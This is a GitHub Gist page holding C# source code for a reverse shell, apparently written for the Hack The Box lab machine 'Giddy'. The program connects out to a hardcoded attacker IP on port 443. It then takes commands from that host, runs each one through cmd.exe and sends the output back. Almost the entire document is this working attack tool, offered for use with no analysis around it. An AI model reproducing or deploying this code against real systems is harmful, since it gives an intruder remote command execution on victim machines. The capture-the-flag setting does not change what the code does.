Created
February 6, 2019 09:47
-
-
Save MinatoTW/c540c3c4c3ce494a603fe15601c17646 to your computer and use it in GitHub Desktop.
Sample reverse shell code for HTB Giddy.
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
using System; | |
using System.Text; | |
using System.IO; | |
using System.Net; | |
using System.Net.Sockets; | |
using System.Diagnostics; | |
class Server { | |
public static void Main(String[] args) { | |
Socket s = null; | |
String server = "10.10.12.75"; | |
byte[] res = new byte[1024]; | |
byte[] msg = Encoding.UTF8.GetBytes("Pwned Giddy!\n"); | |
IPAddress me = IPAddress.Parse(server); | |
IPEndPoint i = new IPEndPoint(me, 443); // Our IP and Port | |
s = new Socket(AddressFamily.InterNetwork, SocketType.Stream, ProtocolType.Tcp); | |
s.Connect(i); | |
if(s.Connected) { | |
s.Send(msg, 0, msg.Length, SocketFlags.None); | |
} | |
while(true) { | |
Array.Clear(res, 0, res.Length); | |
s.Receive(res, 0, s.Available, SocketFlags.None); | |
String cmd = (Encoding.UTF8.GetString(res)).Trim(); | |
cmd = cmd.Replace("\r", string.Empty); | |
cmd = cmd.Replace("\n", string.Empty); | |
if(!string.IsNullOrEmpty(cmd)) { | |
byte[] output = Encoding.UTF8.GetBytes(getOutput(cmd)); | |
s.Send(output, 0, output.Length, SocketFlags.None); | |
} | |
} | |
} | |
public static String getOutput(String cmd) { | |
var psi = new ProcessStartInfo { | |
FileName = "cmd.exe", | |
Arguments = "/c " + cmd, | |
RedirectStandardOutput = true, | |
RedirectStandardError = true, | |
UseShellExecute = false | |
}; | |
Console.WriteLine(psi.Arguments.Trim()); | |
var p = Process.Start(psi); | |
String res = p.StandardOutput.ReadToEnd(); | |
res += p.StandardError.ReadToEnd(); | |
p.WaitForExit(); | |
return res; | |
} | |
} |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment